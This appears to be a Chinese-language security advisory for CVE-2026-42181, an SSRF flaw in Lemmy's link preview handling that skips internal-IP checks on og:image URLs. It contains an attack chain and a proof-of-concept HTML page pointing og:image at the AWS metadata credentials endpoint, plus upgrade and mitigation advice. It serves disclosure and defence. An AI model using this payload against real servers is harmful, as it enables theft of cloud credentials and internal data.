CVE-2026-42181: Lemmy 内部信息泄露漏洞

漏洞信息

漏洞编号

CVE-2026-42181

漏洞类型

SSRF (服务器端请求伪造)

CVSS评分

6.5 中危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

Lemmy

漏洞概述

Lemmy 在 0.19.18 版本之前存在安全漏洞。当获取帖子的元数据预览时，系统虽然检查了页面 URL 的内网 IP 范围，但未对提取的 Open Graph 图像 URL 进行同样的限制。低权限攻击者可构造恶意页面，诱导服务端请求并存储内网图片资源，导致内部信息泄露。

技术细节

该漏洞源于 Lemmy 在处理链接预览时的逻辑缺陷。当用户提交包含 URL 的帖子时，Lemmy 默认的 `StoreLinkPreviews` 模式会尝试获取该页面的元数据以生成预览。虽然系统对页面主 URL 实施了内网 IP 过滤（如 127.0.0.1 或 10.x.x.x），但在解析 HTML 并提取 `og:image` 标签内容时，缺失了同样的内网 IP 校验机制。
攻击者只需拥有低权限账号，即可在外网搭建一个恶意 HTML 页面，将其 `og:image` 属性指向目标内网敏感资源（例如 AWS 元数据服务 `http://169.254.169.254/latest/meta-data/` 或内部管理面板）。Lemmy 服务器会代替用户发起请求，获取该内网资源并缓存为本地缩略图。攻击者随后通过访问帖子预览功能，即可获取内网敏感信息的截图或文件，从而实现服务器端请求伪造（SSRF）并导致信息泄露。

攻击链分析

STEP 1

准备恶意页面

攻击者在公网可控服务器上部署一个 HTML 页面，在 <meta> 标签中设置 og:image 属性指向目标内网的敏感地址（如 127.0.0.1 或元数据服务）。

STEP 2

发布恶意链接

攻击者使用 Lemmy 平台的低权限账号发布新帖子，将上述恶意页面的 URL 填入帖子内容中。

STEP 3

服务端请求

Lemmy 服务器后台自动解析该 URL，提取出 og:image 指向的内网地址。由于校验逻辑缺失，服务器向该内网地址发起 HTTP 请求。

STEP 4

缓存与回显

Lemmy 获取内网响应内容（如图片或文本），将其作为缩略图存储在本地 pict-rs 服务中，并在帖子预览中展示。

STEP 5

获取信息

攻击者查看自己发布的帖子，通过缩略图预览功能获取到内网敏感信息，完成信息泄露。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

<!-- 
PoC Description: Malicious HTML file to be hosted on a public server.
The attacker sets the og:image tag to an internal resource (e.g., AWS metadata).
-->
<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta property="og:title" content="SSRF PoC">
    <!-- Pointing to an internal resource to trigger Lemmy to fetch it -->
    <meta property="og:image" content="http://169.254.169.254/latest/meta-data/identity-credentials/ec2/security-credentials/ec2-instance">
    <title>Lemmy CVE-2026-42181 PoC</title>
</head>
<body>
    <h1>If you see this, the page is hosted correctly.</h1>
    <p>Submit this URL to Lemmy to trigger the vulnerability.</p>
</body>
</html>

影响范围

Lemmy < 0.19.18

防御指南

临时缓解措施

建议管理员立即升级至 Lemmy 0.19.18 版本以修复此漏洞。若无法立即升级，可考虑临时禁用链接预览功能（StoreLinkPreviews）或严格限制用户发帖权限，直到完成修复。